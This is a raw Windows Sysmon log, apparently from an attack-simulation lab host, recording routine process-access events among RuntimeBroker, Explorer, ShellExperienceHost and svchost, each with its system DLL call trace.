21:43:46.546{39BD8DE3-0FD9-60CA-8400-00000000D101}37204336C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+2a448d|C:\Windows\System32\windows.storage.dll+74783|C:\Windows\System32\windows.storage.dll+747fa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x8000000000000000149586Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.546{39BD8DE3-0FD9-60CA-8400-00000000D101}37204336C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+2ca5c2|C:\Windows\System32\windows.storage.dll+cb155|C:\Windows\System32\windows.storage.dll+74066|C:\Windows\System32\windows.storage.dll+2a43ef|C:\Windows\System32\windows.storage.dll+74783|C:\Windows\System32\windows.storage.dll+747fa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 10341000x8000000000000000149585Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.514{39BD8DE3-0FD9-60CA-8400-00000000D101}37204336C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+c6b73|C:\Windows\System32\windows.storage.dll+c62e1|C:\Windows\System32\windows.storage.dll+c61f5|C:\Windows\System32\windows.storage.dll+c618e|C:\Windows\System32\windows.storage.dll+11c559|C:\Windows\System32\windows.storage.dll+61096|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 10341000x8000000000000000149584Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.514{39BD8DE3-0FD9-60CA-8400-00000000D101}37204336C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+c94c3|C:\Windows\System32\windows.storage.dll+11c3d0|C:\Windows\System32\windows.storage.dll+11c327|C:\Windows\System32\windows.storage.dll+11c4f7|C:\Windows\System32\windows.storage.dll+61096|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea 10341000x8000000000000000149583Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.514{39BD8DE3-0FD9-60CA-8400-00000000D101}37204336C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+cb257|C:\Windows\System32\windows.storage.dll+61155|C:\Windows\System32\windows.storage.dll+61078|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x8000000000000000149582Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.514{39BD8DE3-0FD9-60CA-8400-00000000D101}37204336C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+61129|C:\Windows\System32\windows.storage.dll+61078|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.storage.dll+cc60c 10341000x8000000000000000149581Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.497{39BD8DE3-0FD9-60CA-8400-00000000D101}37204336C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+c6b73|C:\Windows\System32\windows.storage.dll+c62e1|C:\Windows\System32\windows.storage.dll+c61f5|C:\Windows\System32\windows.storage.dll+c618e|C:\Windows\System32\windows.storage.dll+11c559|C:\Windows\System32\windows.storage.dll+61096|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 10341000x8000000000000000149580Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.497{39BD8DE3-0FD9-60CA-8400-00000000D101}37204336C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+c94c3|C:\Windows\System32\windows.storage.dll+11c3d0|C:\Windows\System32\windows.storage.dll+11c327|C:\Windows\System32\windows.storage.dll+11c4f7|C:\Windows\System32\windows.storage.dll+61096|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea 10341000x8000000000000000149579Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.497{39BD8DE3-0FD9-60CA-8400-00000000D101}37204336C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+cb257|C:\Windows\System32\windows.storage.dll+61155|C:\Windows\System32\windows.storage.dll+61078|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x8000000000000000149578Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.497{39BD8DE3-0FD9-60CA-8400-00000000D101}37204336C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+61129|C:\Windows\System32\windows.storage.dll+61078|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.storage.dll+cc60c 10341000x8000000000000000149577Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.497{39BD8DE3-0FD9-60CA-8400-00000000D101}37201624C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+9f408|C:\Windows\System32\windows.storage.dll+1a2b29|C:\Windows\System32\windows.storage.dll+1a2985|C:\Windows\System32\windows.storage.dll+a0166|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x8000000000000000149576Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.482{39BD8DE3-0FD9-60CA-8400-00000000D101}37206620C:\Windows\System32\RuntimeBroker.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+9f408|C:\Windows\System32\windows.storage.dll+1a2b29|C:\Windows\System32\windows.storage.dll+1a2985|C:\Windows\System32\windows.storage.dll+a0166|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x8000000000000000149575Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.466{39BD8DE3-0F64-60CA-0C00-00000000D101}7206400C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149574Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.466{39BD8DE3-0F64-60CA-0C00-00000000D101}7206400C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149573Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.466{39BD8DE3-0F64-60CA-0C00-00000000D101}7206400C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149572Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.428{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x8000000000000000149571Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.428{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883864C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x8000000000000000149570Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.428{39BD8DE3-0FD9-60CA-8B00-00000000D101}19884996C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149569Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.428{39BD8DE3-0FD9-60CA-8B00-00000000D101}19884996C:\Windows\Explorer.EXE{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149568Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.413{39BD8DE3-0F64-60CA-0C00-00000000D101}7206400C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149567Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.413{39BD8DE3-0F64-60CA-0C00-00000000D101}7206400C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149566Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 